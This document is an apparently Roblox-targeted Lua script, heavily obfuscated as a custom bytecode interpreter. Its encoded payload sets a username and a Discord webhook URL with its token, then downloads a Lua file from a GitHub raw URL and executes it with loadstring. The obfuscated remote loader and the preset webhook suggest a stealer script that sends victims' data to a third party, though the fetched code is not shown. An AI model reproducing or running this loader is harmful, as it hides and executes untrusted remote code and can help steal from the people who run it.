do
	local v0 = 0;
	local v1;
	local v2;
	local v3;
	local v4;
	local v5;
	local v6;
	local v7;
	local v8;
	local v9;
	local v10;
	local v11;
	local v12;
	local v13;
	local v14;
	local v15;
	local v16;
	while true do
		if (v0 == 1) then
			v4 = string.sub;
			v5 = string.gsub;
			v6 = string.rep;
			v0 = 2;
		end
		if (v0 == 0) then
			v1 = tonumber;
			v2 = string.byte;
			v3 = string.char;
			v0 = 1;
		end
		if (5 == v0) then
			v16 = nil;
			v16 = function(v22, v23, ...)
				local v27 = 1;
				local v28;
				v22 = v5(v4(v22, 5), "..", function(v29)
					if (v2(v29, 2) == 79) then
						v28 = v1(v4(v29, 1, 1));
						return "";
					else
						local v77 = 0;
						local v78;
						while true do
							if (0 == v77) then
								v78 = v3(v1(v29, 16));
								if v28 then
									local v117 = 0;
									local v118;
									while true do
										if (v117 == 0) then
											v118 = v6(v78, v28);
											v28 = nil;
											v117 = 1;
										end
										if (v117 == 1) then
											return v118;
										end
									end
								else
									return v78;
								end
								break;
							end
						end
					end
				end);
				local function v30(v31, v32, v33)
					if v33 then
						local v79 = 1308 - ((2259 - (1174 + 45)) + 268);
						local v80;
						while true do
							if (v79 == 0) then
								v80 = (v31 / ((1 + 1) ^ (v32 - (1118 - (906 + 211))))) % (((743 - 212) - (248 + 281)) ^ (((v33 - (1 + 0)) - (v32 - 1)) + 1 + 0));
								return v80 - (v80 % 1);
							end
						end
					else
						local v81 = 1331 - (384 + 947);
						local v82;
						while true do
							if (v81 == (0 + 0)) then
								v82 = (2 + 0 + 0) ^ (v32 - (1934 - (513 + 1420)));
								return (((v31 % (v82 + v82)) >= v82) and (1 - 0)) or (0 - 0);
							end
						end
					end
				end
				local function v34()
					local v47 = v2(v22, v27, v27);
					v27 = v27 + 1;
					return v47;
				end
				local function v35()
					local v48, v49 = v2(v22, v27, v27 + 2);
					v27 = v27 + (7 - 5);
					return (v49 * (950 - 694)) + v48;
				end
				local function v36()
					local v50, v51, v52, v53 = v2(v22, v27, v27 + (1553 - (360 + 1190)));
					v27 = v27 + (1331 - (548 + 779));
					return (v53 * (49773998 - 32996782)) + (v52 * (66389 - (164 + 689))) + (v51 * (445 - (4 + 185))) + v50;
				end
				local function v37()
					local v54 = v36();
					local v55 = v36();
					local v56 = (1640 - (476 + 1163)) + 0;
					local v57 = (v30(v55, 1934 - (1644 + 289), 10 + 10) * ((135 - (111 + 22)) ^ (78 - 46))) + v54;
					local v58 = v30(v55, 688 - (427 + 240), 31);
					local v59 = ((v30(v55, 52 - 20) == 1) and -(1875 - (139 + 1735))) or (1 - (0 - 0));
					if (v58 == (0 - 0)) then
						if (v57 == (1384 - (902 + 482))) then
							return v59 * 0;
						else
							local v91 = 1412 - ((45 - 14) + 1381);
							while true do
								if ((0 + 0) == v91) then
									v58 = 1592 - (50 + 1541);
									v56 = 0 + 0;
									break;
								end
							end
						end
					elseif (v58 == (1744 + 303)) then
						return ((v57 == (0 + 0)) and (v59 * ((3 - 2) / (0 - 0)))) or (v59 * NaN);
					end
					return v9(v59, v58 - ((2388 - (1774 + 49)) + 458)) * (v56 + (v57 / (((14 - 8) - (1 + 3)) ^ (44 + 8))));
				end
				local function v38(v39)
					local v60;
					if not v39 then
						local v83 = (0 - 0) + 0;
						while true do
							if (v83 == (0 - 0)) then
								v39 = v36();
								if (v39 == (0 + 0)) then
									return "";
								end
								break;
							end
						end
					end
					v60 = v4(v22, v27, (v27 + v39) - (387 - (361 + 25)));
					v27 = v27 + v39;
					local v61 = {};
					for v75 = 1, #v60 do
						v61[v75] = v3(v2(v4(v60, v75, v75)));
					end
					return v7(v61);
				end
				local v40 = v36;
				local function v41(...)
					return {...}, v13("#", ...);
				end
				local function v42()
					local v62 = 0;
					local v63;
					local v64;
					local v65;
					local v66;
					local v67;
					local v68;
					local v69;
					local v70;
					while true do
						if (1 == v62) then
							local v84 = 1184 - (1048 + 136);
							while true do
								if (v84 == (0 + 0)) then
									v65 = nil;
									v66 = nil;
									v84 = 549 - (228 + 320);
								end
								if (v84 ~= (1 - 0)) then
								else
									v62 = 2;
									break;
								end
							end
						end
						if (v62 == 3) then
							local v85 = 0 - 0;
							while true do
								if (v85 ~= (1 - 0)) then
								else
									v62 = 18 - 14;
									break;
								end
								if (v85 ~= 0) then
								else
									v69 = nil;
									v70 = nil;
									v85 = 3 - 2;
								end
							end
						end
						if ((1809 - (343 + 1462)) ~= v62) then
						else
							while true do
								if (v63 == (3 - 2)) then
									local v107 = 0;
									local v108;
									while true do
										if (v107 == (0 + 0)) then
											v108 = 0 + 0;
											while true do
												if (v108 == (4 - 3)) then
													v63 = 2;
													break;
												end
												if (v108 ~= 0) then
												else
													local v125 = 0 - 0;
													while true do
														if (v125 ~= 0) then
														else
															v66 = nil;
															v67 = nil;
															v125 = 1;
														end
														if ((1 + 0) ~= v125) then
														else
															v108 = 1;
															break;
														end
													end
												end
											end
											break;
										end
									end
								end
								if (v63 == 0) then
									v64 = 1353 - (923 + 430);
									v65 = nil;
									v63 = 553 - (389 + 163);
								end
								if (v63 ~= (1883 - (1224 + 656))) then
								else
									v70 = nil;
									while true do
										local v119 = 1310 - (266 + 1044);
										local v120;
										while true do
											if (v119 ~= 0) then
											else
												v120 = 0 - 0;
												while true do
													if (v120 ~= 1) then
													else
														if ((78 - (44 + 34)) ~= v64) then
														else
															local v128 = 0 + 0;
															local v129;
															while true do
																if (v128 == 0) then
																	v129 = 0;
																	while true do
																		if (2 == v129) then
																			v64 = 1;
																			break;
																		end
																		if (v129 == (0 - 0)) then
																			local v137 = 0;
																			local v138;
																			while true do
																				if (0 == v137) then
																					v138 = 0 - 0;
																					while true do
																						if (v138 == 0) then
																							local v169 = 0;
																							while true do
																								if (v169 == 0) then
																									v65 = {};
																									v66 = {};
																									v169 = 1 - 0;
																								end
																								if (v169 == (2 - 1)) then
																									v138 = 1;
																									break;
																								end
																							end
																						end
																						if (v138 == 1) then
																							v129 = 1;
																							break;
																						end
																					end
																					break;
																				end
																			end
																		end
																		if (1 ~= v129) then
																		else
																			local v139 = 0;
																			while true do
																				if ((897 - (844 + 53)) == v139) then
																					v67 = {};
																					v68 = {v65,v66,nil,v67};
																					v139 = 1;
																				end
																				if (v139 ~= 1) then
																				else
																					v129 = 2 - 0;
																					break;
																				end
																			end
																		end
																	end
																	break;
																end
															end
														end
														break;
													end
													if (v120 ~= 0) then
													else
														local v127 = 0 + 0;
														while true do
															if (v127 ~= (1143 - (281 + 862))) then
															else
																if (v64 ~= (717 - (487 + 228))) then
																else
																	local v132 = 0 - 0;
																	local v133;
																	while true do
																		if (v132 == 0) then
																			v133 = 0 - 0;
																			while true do
																				local v153 = 0;
																				while true do
																					if (v153 == 0) then
																						if (v133 == 0) then
																							local v170 = 0 - 0;
																							local v171;
																							while true do
																								if (v170 == (0 - 0)) then
																									v171 = 141 - (117 + 24);
																									while true do
																										if (0 == v171) then
																											for v190 = 1, v36() do
																												local v191 = 0 - 0;
																												local v192;
																												while true do
																													if (v191 == (0 - 0)) then
																														v192 = v34();
																														if (v30(v192, 1504 - (626 + 877), 1) == (1300 - (56 + 1244))) then
																															local v201 = 0 + 0;
																															local v202;
																															local v203;
																															local v204;
																															local v205;
																															while true do
																																if (v201 == 0) then
																																	v202 = 0 - 0;
																																	v203 = nil;
																																	v201 = 1944 - (747 + 1196);
																																end
																																if (v201 ~= 2) then
																																else
																																	while true do
																																		if (v202 == 1) then
																																			local v211 = 1351 - (1336 + 15);
																																			while true do
																																				if (v211 ~= (0 + 0)) then
																																				else
																																					v205 = {v35(),v35(),nil,nil};
																																					if (v203 == 0) then
																																						local v219 = 0;
																																						while true do
																																							if (v219 ~= (51 - (39 + 12))) then
																																							else
																																								v205[3] = v35();
																																								v205[3 + 1] = v35();
																																								break;
																																							end
																																						end
																																					elseif (v203 == (146 - (42 + 103))) then
																																						v205[1779 - (951 + 825)] = v36();
																																					elseif (v203 == (1 + 1)) then
																																						v205[997 - (557 + 437)] = v36() - ((5 - 3) ^ (62 - 46));
																																					elseif (v203 ~= 3) then
																																					else
																																						local v226 = 0;
																																						local v227;
																																						local v228;
																																						while true do
																																							if (v226 ~= 1) then
																																							else
																																								while true do
																																									if (v227 ~= 0) then
																																									else
																																										v228 = 0;
																																										while true do
																																											if (v228 ~= (829 - (568 + 261))) then
																																											else
																																												v205[1187 - (154 + 1030)] = v36() - ((1608 - (807 + 799)) ^ 16);
																																												v205[4] = v35();
																																												break;
																																											end
																																										end
																																										break;
																																									end
																																								end
																																								break;
																																							end
																																							if (v226 ~= 0) then
																																							else
																																								v227 = 0;
																																								v228 = nil;
																																								v226 = 129 - (119 + 9);
																																							end
																																						end
																																					end
																																					v211 = 1 + 0;
																																				end
																																				if (v211 == 1) then
																																					v202 = 2;
																																					break;
																																				end
																																			end
																																		end
																																		if (v202 == (1 + 1)) then
																																			local v212 = 0;
																																			local v213;
																																			while true do
																																				if (v212 == (0 + 0)) then
																																					v213 = 0 - 0;
																																					while true do
																																						if (v213 ~= (0 - 0)) then
																																						else
																																							local v220 = 0;
																																							while true do
																																								if (v220 == (1431 - (15 + 1415))) then
																																									v213 = 1 + 0;
																																									break;
																																								end
																																								if (v220 == 0) then
																																									if (v30(v204, 1, 3 - 2) == (1222 - (851 + 370))) then
																																										v205[407 - (134 + 271)] = v70[v205[9 - 7]];
																																									end
																																									if (v30(v204, 768 - (210 + 556), 2) == (1 + 0)) then
																																										v205[1848 - (1079 + 766)] = v70[v205[3]];
																																									end
																																									v220 = 1;
																																								end
																																							end
																																						end
																																						if (v213 ~= 1) then
																																						else
																																							v202 = 3 + 0;
																																							break;
																																						end
																																					end
																																					break;
																																				end
																																			end
																																		end
																																		if (v202 ~= 3) then
																																		else
																																			if (v30(v204, 2 + 1, 3) == (23 - (6 + 16))) then
																																				v205[1374 - (111 + 1259)] = v70[v205[4]];
																																			end
																																			v65[v190] = v205;
																																			break;
																																		end
																																		if (v202 ~= (0 - 0)) then
																																		else
																																			local v215 = 0 + 0;
																																			local v216;
																																			while true do
																																				if (v215 == 0) then
																																					v216 = 0 + 0;
																																					while true do
																																						if (v216 == 1) then
																																							v202 = 1 - 0;
																																							break;
																																						end
																																						if (v216 == 0) then
																																							v203 = v30(v192, 2, 956 - (331 + 622));
																																							v204 = v30(v192, 4, 17 - 11);
																																							v216 = 799 - (704 + 94);
																																						end
																																					end
																																					break;
																																				end
																																			end
																																		end
																																	end
																																	break;
																																end
																																if (v201 ~= (1 + 0)) then
																																else
																																	local v206 = 0 - 0;
																																	while true do
																																		if (v206 ~= (786 - (479 + 307))) then
																																		else
																																			v204 = nil;
																																			v205 = nil;
																																			v206 = 427 - (70 + 356);
																																		end
																																		if (v206 ~= 1) then
																																		else
																																			v201 = 2 - 0;
																																			break;
																																		end
																																	end
																																end
																															end
																														end
																														break;
																													end
																												end
																											end
																											for v193 = 1, v36() do
																												v66[v193 - (1 + 0)] = v42();
																											end
																											v171 = 1;
																										end
																										if (v171 == 1) then
																											v133 = 1747 - (1512 + 234);
																											break;
																										end
																									end
																									break;
																								end
																							end
																						end
																						if (v133 == 1) then
																							for v179 = 1, v36() do
																								v67[v179] = v36();
																							end
																							return v68;
																						end
																						break;
																					end
																				end
																			end
																			break;
																		end
																	end
																end
																if (v64 ~= (1 + 0)) then
																else
																	local v134 = 0 - 0;
																	local v135;
																	local v136;
																	while true do
																		if (v134 == 1) then
																			while true do
																				if (v135 == 0) then
																					v136 = 0 + 0;
																					while true do
																						if ((1 + 0) == v136) then
																							local v172 = 0 + 0;
																							local v173;
																							while true do
																								if (0 == v172) then
																									v173 = 0;
																									while true do
																										if (v173 == (0 + 0)) then
																											for v195 = 956 - (492 + 463), v69 do
																												local v196 = 299 - (269 + 30);
																												local v197;
																												local v198;
																												local v199;
																												local v200;
																												while true do
																													if (v196 == (0 - 0)) then
																														v197 = 0;
																														v198 = nil;
																														v196 = 1;
																													end
																													if (v196 == 2) then
																														while true do
																															if (v197 == (1489 - (114 + 1374))) then
																																v200 = nil;
																																while true do
																																	if (v198 ~= 1) then
																																	else
																																		if (v199 == 1) then
																																			v200 = v34() ~= 0;
																																		elseif (v199 == 2) then
																																			v200 = v37();
																																		elseif (v199 ~= 3) then
																																		else
																																			v200 = v38();
																																		end
																																		v70[v195] = v200;
																																		break;
																																	end
																																	if (v198 == 0) then
																																		local v208 = 0 + 0;
																																		local v209;
																																		local v210;
																																		while true do
																																			if (v208 == 0) then
																																				v209 = 0;
																																				v210 = nil;
																																				v208 = 2 - 1;
																																			end
																																			if (v208 ~= 1) then
																																			else
																																				while true do
																																					if (v209 ~= 0) then
																																					else
																																						v210 = 0;
																																						while true do
																																							if ((2 - 1) == v210) then
																																								v198 = 1 + 0;
																																								break;
																																							end
																																							if (v210 == 0) then
																																								local v222 = 0;
																																								while true do
																																									if (v222 == (1108 - (543 + 564))) then
																																										v210 = 1 - 0;
																																										break;
																																									end
																																									if (v222 ~= 0) then
																																									else
																																										v199 = v34();
																																										v200 = nil;
																																										v222 = 2 - 1;
																																									end
																																								end
																																							end
																																						end
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																	end
																																end
																																break;
																															end
																															if (v197 == (0 + 0)) then
																																v198 = 1811 - (1740 + 71);
																																v199 = nil;
																																v197 = 1 + 0;
																															end
																														end
																														break;
																													end
																													if (1 == v196) then
																														v199 = nil;
																														v200 = nil;
																														v196 = 2;
																													end
																												end
																											end
																											v68[1 + 2] = v34();
																											v173 = 1;
																										end
																										if (v173 == 1) then
																											v136 = 4 - 2;
																											break;
																										end
																									end
																									break;
																								end
																							end
																						end
																						if ((5 - 3) == v136) then
																							v64 = 2;
																							break;
																						end
																						if (v136 ~= 0) then
																						else
																							local v174 = 0;
																							local v175;
																							while true do
																								if (v174 ~= 0) then
																								else
																									v175 = 0 + 0;
																									while true do
																										if ((2 - 1) == v175) then
																											v136 = 3 - 2;
																											break;
																										end
																										if (v175 == 0) then
																											local v189 = 769 - (385 + 384);
																											while true do
																												if (v189 == (0 + 0)) then
																													v69 = v36();
																													v70 = {};
																													v189 = 1;
																												end
																												if (1 == v189) then
																													v175 = 1 + 0;
																													break;
																												end
																											end
																										end
																									end
																									break;
																								end
																							end
																						end
																					end
																					break;
																				end
																			end
																			break;
																		end
																		if ((0 - 0) == v134) then
																			v135 = 0;
																			v136 = nil;
																			v134 = 486 - (298 + 187);
																		end
																	end
																end
																v127 = 1 + 0;
															end
															if (v127 == (1 + 0)) then
																v120 = 3 - 2;
																break;
															end
														end
													end
												end
												break;
											end
										end
									end
									break;
								end
								if (v63 ~= 2) then
								else
									local v109 = 0;
									local v110;
									while true do
										if ((1678 - (1469 + 209)) == v109) then
											v110 = 0 - 0;
											while true do
												if (v110 == 0) then
													local v126 = 0 - 0;
													while true do
														if (v126 == (0 - 0)) then
															v68 = nil;
															v69 = nil;
															v126 = 1;
														end
														if (1 ~= v126) then
														else
															v110 = 1 - 0;
															break;
														end
													end
												end
												if (v110 ~= 1) then
												else
													v63 = 6 - 3;
													break;
												end
											end
											break;
										end
									end
								end
							end
							break;
						end
						if (v62 ~= (0 - 0)) then
						else
							local v86 = 1213 - (376 + 837);
							while true do
								if ((79 - (31 + 48)) == v86) then
									v63 = 0 - 0;
									v64 = nil;
									v86 = 1;
								end
								if (1 == v86) then
									v62 = 1;
									break;
								end
							end
						end
						if (v62 == 2) then
							local v87 = 0;
							while true do
								if (v87 == (1 + 0)) then
									v62 = 2 + 1;
									break;
								end
								if (v87 == (0 + 0)) then
									v67 = nil;
									v68 = nil;
									v87 = 1;
								end
							end
						end
					end
				end
				local function v43(v44, v45, v46)
					local v71 = 0;
					local v72;
					local v73;
					local v74;
					while true do
						if (v71 == 1) then
							v74 = v44[3];
							return function(...)
								local v92 = 1;
								local v93 = -1;
								local v94 = {...};
								local v95 = v13("#", ...) - 1;
								local function v96()
									local v97 = v72;
									local v98 = v73;
									local v99 = v74;
									local v100 = v41;
									local v101 = {};
									local v102 = {};
									local v103 = {};
									for v111 = (0 - 0) - (292 - (125 + 167)), v95 do
										if (((47 + 409) == ((809 + 73) - (214 + 202 + 10))) and (v111 >= v99)) then
											v101[v111 - v99] = v94[v111 + (285 - (34 + 250))];
										else
											v103[v111] = v94[v111 + (577 - (288 + 288))];
										end
									end
									local v104 = (v95 - v99) + (2 - 1);
									local v105;
									local v106;
									while true do
										local v112 = 156 - (141 + 15);
										local v113;
										local v114;
										while true do
											if ((((30471 - 22431) - 3540) > (633 + 982)) and (v112 == 0)) then
												v113 = 77 - (12 + 65);
												v114 = nil;
												v112 = 1 - 0;
											end
											if (((2 - (2 - 1)) == v112) or ((11544 - 8281) == 1661)) then
												while true do
													if ((1378 > (479 - 144)) and (v113 == (0 - 0))) then
														v114 = 0 + 0;
														while true do
															if ((v114 == (3 - 2)) or (((68 + 4747) - (485 + 417)) <= (2448 - (637 + 878)))) then
																if (((8426 - 5319) <= 3213) and (v106 <= (1615 - (1291 + 320)))) then
																	if ((v106 <= (705 - (332 + (1232 - (456 + 404))))) or ((1581 - (1067 + 471)) > (1638 + 1282))) then
																		if ((v106 == (0 + 0)) or (2696 <= 1096)) then
																			v103[v105[133 - (73 + 58)]]();
																		else
																			local v140 = 828 - (365 + 463);
																			local v141;
																			local v142;
																			local v143;
																			local v144;
																			local v145;
																			while true do
																				if ((v140 == (274 - (34 + 239))) or ((111 + 1070 + 549) > (5849 - 1722))) then
																					v143 = nil;
																					v144 = nil;
																					v140 = 6 - 4;
																				end
																				if ((v140 == ((1397 - (112 + 1285)) - 0)) or ((3812 - ((983 - (676 + 144)) + 1042 + 446)) <= (5300 - 3420))) then
																					v141 = 0 + 0;
																					v142 = nil;
																					v140 = 1 + 0;
																				end
																				if ((v140 == ((1730 - (508 + 1221)) + 1)) or ((5602 - (44 + 195 + 396)) == (545 + 484))) then
																					v145 = nil;
																					while true do
																						if (((541 - (89 + 215)) == (858 - 621)) and (v141 == (1 + 0))) then
																							v93 = (v144 + v142) - (1 + 0);
																							v145 = 0;
																							v141 = 1751 - (1017 + (2440 - (217 + 1491)));
																						end
																						if ((v141 == (0 - 0)) or (2519 == ((14870 - 10087) - (9 + 67)))) then
																							local v176 = 0;
																							while true do
																								if ((v176 == (1 + 0)) or ((3120 - (259 + 789)) > (7605 - 4210))) then
																									v141 = 1978 - (39 + 1938);
																									break;
																								end
																								if ((4014 < 4825) and (v176 == (0 - 0))) then
																									v142 = v105[119 - (54 + 63)];
																									v143, v144 = v100(v103[v142](v14(v103, v142 + (2 - 1), v105[3])));
																									v176 = 1;
																								end
																							end
																						end
																						if (((2142 - (295 + 159)) > ((3092 - (929 + 190)) - (456 + 140))) and (v141 == ((1688 - 825) - ((1617 - (638 + 742)) + 624)))) then
																							for v181 = v142, v93 do
																								local v182 = 0 + 0;
																								while true do
																									if ((v182 == (0 - 0)) or ((7987 - 4116) < 286)) then
																										v145 = v145 + 1;
																										v103[v181] = v143[v145];
																										break;
																									end
																								end
																							end
																							break;
																						end
																					end
																					break;
																				end
																			end
																		end
																	elseif ((v106 <= (1264 - (897 + 365))) or (927 >= (3700 - 2355))) then
																		do
																			return;
																		end
																	elseif ((1790 == (1289 + 501)) and (v106 == 3)) then
																		local v154 = 0 + 0;
																		local v155;
																		local v156;
																		while true do
																			if (((2636 - 1743) <= (1343 + 1732)) and ((1 + 0) == v154)) then
																				v103[v155 + 1] = v156;
																				v103[v155] = v156[v105[4]];
																				break;
																			end
																			if ((v154 == (0 + 0)) or ((3884 - (10 + 43)) == ((310 + 1533) - (1159 + 18)))) then
																				local v168 = 0 - 0;
																				while true do
																					if (((2203 + 1886) == (5701 - (1202 + 410))) and (v168 == (1 - 0))) then
																						v154 = 1591 - (766 + 824);
																						break;
																					end
																					if ((2100 >= 238) and (v168 == (0 - 0))) then
																						v155 = v105[5 - 3];
																						v156 = v103[v105[1232 - (45 + 1184)]];
																						v168 = 1 + 0;
																					end
																				end
																			end
																		end
																	else
																		v103[v105[3 - 1]] = v105[11 - 8];
																	end
																elseif ((v106 <= (19 - 13)) or ((5718 - (457 + 854)) < 3313)) then
																	if ((v106 > 5) or ((46 + 197) > (2498 - (131 + 11 + 355)))) then
																		v103[v105[2 + (0 - 0)]] = v46[v105[10 - 7]];
																	else
																		v92 = v105[568 - (46 + 519)];
																	end
																elseif (((778 - 217) < (1053 + 39 + 677)) and (v106 <= (5 + 2))) then
																	local v149 = 0 - 0;
																	local v150;
																	local v151;
																	while true do
																		if ((v149 == (0 - 0)) or ((2504 + 463) < (4644 - (10959 - 8321)))) then
																			local v161 = 0 + 0;
																			while true do
																				if (((1029 + 903 + 1165) >= (458 + 869)) and (v161 == (0 + 0))) then
																					v150 = 0 - 0;
																					v151 = nil;
																					v161 = 70 - (8 + 61);
																				end
																				if ((v161 == (1 - (1144 - (363 + 781)))) or (((3315 - (604 + 556)) - (50 + 23)) > ((5604 - 3390) + 2601))) then
																					v149 = 1 - 0;
																					break;
																				end
																			end
																		end
																		if ((v149 == (3 - 2)) or ((1902 - (318 + 67)) > (490 + 2835))) then
																			while true do
																				if (((0 - 0) == v150) or ((7032 - (5396 - 2641)) == 3944)) then
																					v151 = v105[2];
																					v103[v151] = v103[v151](v14(v103, v151 + (1698 - (705 + 992)), v93));
																					break;
																				end
																			end
																			break;
																		end
																	end
																elseif ((v106 == (8 + 0)) or (1027 > ((7386 + 8116) - 10946))) then
																	v46[v105[3]] = v103[v105[617 - (356 + 78 + 181)]];
																elseif ((v103[v105[444 - (115 + 327)]] == v105[7 - 3]) or (2055 <= (2078 - (4 + 144)))) then
																	v92 = v92 + (914 - (520 + 0 + 393));
																else
																	v92 = v105[5 - 2];
																end
																v92 = v92 + ((137 + 320) - (455 + 1));
																break;
															end
															if (((5827 - (473 + 1368)) >= 1755) and (v114 == (1535 - (809 + 726)))) then
																local v130 = 0 + 0;
																local v131;
																while true do
																	if ((v130 == (1537 - (1091 + (1464 - 1018)))) or (((13612 - 7995) - (1748 + 204)) < ((4047 - (1844 + 152)) + (2634 - 1622)))) then
																		v131 = 0 - (0 + 0);
																		while true do
																			if ((208 <= (2284 - 404)) and (v131 == (2 - 1))) then
																				v114 = 1;
																				break;
																			end
																			if ((v131 == 0) or ((3875 - (78 + (1185 - 697))) < (3606 - 2086))) then
																				local v152 = 0 + 0;
																				while true do
																					if ((v152 == 0) or ((2769 + 436) == (3770 - 1146))) then
																						v105 = v97[v92];
																						v106 = v105[1];
																						v152 = 2 - (1 + 0);
																					end
																					if ((2493 == (502 + 1991)) and (v152 == 1)) then
																						v131 = 2000 - (353 + 1646);
																						break;
																					end
																				end
																			end
																		end
																		break;
																	end
																end
															end
														end
														break;
													end
												end
												break;
											end
										end
									end
								end
								A, B = v41(v12(v96));
								if not A[1] then
									local v115 = 0;
									local v116;
									while true do
										if (v115 == 0) then
											v116 = v44[4][v92] or "?";
											error("Script error at [" .. v116 .. "]:" .. A[2]);
											break;
										end
									end
								else
									return v14(A, 2, B);
								end
							end;
						end
						if (0 == v71) then
							v72 = v44[1];
							v73 = v44[2];
							v71 = 1;
						end
					end
				end
				return v43(v42(), {}, v23)(...);
			end;
			v16("LOL!0A3O00028O0003083O00557365724E616D65030A3O004142755F44686142696403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303738392O312O3231373139332O38322O302F42714A65666835484B64346C446B4F76506953525065647765705944482D6641717A4679764E7538624D4E4547596F4F516349425170495F71565F6D4A6A4E38576E7662026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756100143O0012043O00013O0026093O0008000100010004053O00080001001204000100033O001208000100023O001204000100053O001208000100043O0012043O00063O0026093O0001000100060004053O00010001001206000100073O001206000200083O0020030002000200090012040004000A4O0001000200044O000700013O00024O0001000100010004053O001300010004053O000100012O00023O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00", v10(), ...);
			break;
		end
		if (v0 == 4) then
			v13 = select;
			v14 = unpack or table.unpack;
			v15 = tonumber;
			v0 = 5;
		end
		if (v0 == 2) then
			v7 = table.concat;
			v8 = table.insert;
			v9 = math.ldexp;
			v0 = 3;
		end
		if (v0 == 3) then
			v10 = getfenv or function()
				return _ENV;
			end;
			v11 = setmetatable;
			v12 = pcall;
			v0 = 4;
		end
	end
end
